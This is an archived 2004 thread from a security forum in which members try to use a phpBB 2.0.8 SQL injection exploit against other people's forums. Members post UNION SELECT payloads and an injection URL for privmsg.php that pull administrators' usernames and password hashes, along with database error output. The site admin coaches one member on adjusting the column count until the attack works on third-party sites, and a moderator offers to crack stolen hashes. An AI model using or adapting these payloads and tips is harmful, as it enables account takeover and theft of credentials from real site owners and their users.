Waraxe IT Security Portal
Login or Register
November 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 61
Members: 0
Total: 61
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> phpBB 208 sqlinjection
Post new topicReply to topic View previous topic :: View next topic
phpBB 208 sqlinjection
PostPosted: Wed Sep 08, 2004 9:00 pm Reply with quote
w00
Regular user
Regular user
Joined: Sep 08, 2004
Posts: 8




Hello, i tried the phpBB 208 sqlinjeciotn exploit, wich expose the admin or any other users MD5 hash. But the thing is i cant get it to work on some phpBB forums. I come in debug mode. This is the debug i get (posted below) is there anyway i can modify the sql injection a little bit so it works on other sites too? Thanks for any help.

*i replaced the real name with HOST
Code:

Could not query private message post information

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbbHOST_privmsgs pm, phpbbHOST_privmsgs_text pmt, phpbbHOST_users u, phpbbHOST_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 1087 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 1087 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 238
File : /home/fhlinux194/p/HOST.com/user/htdocs/phpBB2/privmsg.php
View user's profile Send private message
PostPosted: Wed Sep 08, 2004 9:06 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Well, sql error message is clear:

"SQL Error : 1222 The used SELECT statements have a different number of columns"

So you have to

1. count, how many columns original query contains
2. modify UNION query according to previous results.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Sep 08, 2004 9:35 pm Reply with quote
w00
Regular user
Regular user
Joined: Sep 08, 2004
Posts: 8




waraxe wrote:
Well, sql error message is clear:

"SQL Error : 1222 The used SELECT statements have a different number of columns"

So you have to

1. count, how many columns original query contains
2. modify UNION query according to previous results.


yes, that was my point actually. Im sorry i made it unclear what my problem really is. I dont know how to count the columns in a phpbb forum. I dont suppose they mean the amount of "threats" there are like "C++", "Visual Basic" etc. And were exactly do i modify the the amount of columns? Do i change the amount of "NULL's" to the amount of columns present? And about the union, guess thats automaticly corrected after the columns are corrected, or am i wrong here too?
View user's profile Send private message
PostPosted: Thu Sep 09, 2004 11:10 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If we look at original UNION query -
"UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users",
then we can count 31 columns.
For some reason that phpbb installation has different number of colums
in related table. Probably more than 31, but it can be less too. Sql error message is not telling us "more" or "less", just "not equal".
So start with 29 or 30 columns and then move further - 31, 32,33, etc.
If you will get no more this sql error (#SQL 1222 ), then you have now tweaked column count in union query. And next maybe you need to reposition output columns - "username" and "user_password".
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Sep 09, 2004 1:30 pm Reply with quote
w00
Regular user
Regular user
Joined: Sep 08, 2004
Posts: 8




Thanks waraxe, i cant thank you enough. Thanks to you i got it to work.
View user's profile Send private message
PostPosted: Thu Sep 09, 2004 2:55 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I'm happy to help! Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Nov 17, 2004 9:43 am Reply with quote
Wang
Regular user
Regular user
Joined: Oct 30, 2004
Posts: 5




privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%10pm.privmsgs_type=-99%10UNION%10SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%A0GET%A0phpbb_users%A0POST%A0user_level=1%A0LIMIT%A05/*

that string doesn't work Crying or Very sad how do i hack a forum 2.0.8. phpbb Question
View user's profile Send private message
PostPosted: Wed Dec 01, 2004 2:05 am Reply with quote
ToXiC
Moderator
Moderator
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




try md5 hash tables ... or just pm me the hash i will try to crack it ..
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Tue Dec 14, 2004 6:03 pm Reply with quote
katz
Beginner
Beginner
Joined: Oct 09, 2004
Posts: 2




I'm sorry if this is unapropriate but at a version 2.0.6 i got an error
Quote:
Could not query private message post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax near 'UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null' at line 5

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM forums_privmsgs pm, forums_privmsgs_text pmt, forums_users u, forums_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 92 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 92 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /var/www/forums/privmsg.php

Do I have to change anything in the url from the original statement in http://waraxe.us/?modname=sa&id=013 ??
View user's profile Send private message
phpBB 208 sqlinjection
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.061 Seconds